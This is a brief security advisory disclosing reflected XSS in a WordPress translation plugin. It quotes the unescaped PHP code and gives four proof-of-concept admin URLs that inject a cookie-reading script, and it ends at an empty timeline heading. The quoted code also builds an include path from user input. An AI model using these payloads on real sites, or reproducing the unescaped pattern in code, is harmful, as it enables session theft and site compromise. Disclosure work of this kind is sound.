Lingotek Translation 1.1.8 Reflected XSS

Homepage:

https://wordpress.org/plugins/lingotek-translation/

Description:

$_GET['sm'] is not escaped.

File: lingotek-translation\admin\settings.php

$submenu = isset($_GET['sm']) ? $_GET['sm'] : 'account';
$dir = dirname(__FILE__) . '/settings/';
$filename = $dir . 'view-' . $submenu . ".php";
if (file_exists($filename))
  include $filename;
else
  echo "TO-DO: create <i>" . 'settings/view-' . $submenu . ".php</i>";

Similar issue exists also inside view-manage.php and view-tutorial.php.

Proof of Concept:

XSS will be visible for administrator.

http://wp/wp-admin/admin.php?page=wp-lingotek&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_settings&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_tutorial&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_manage&sm=<script>alert(document.cookie);</script>

Timeline: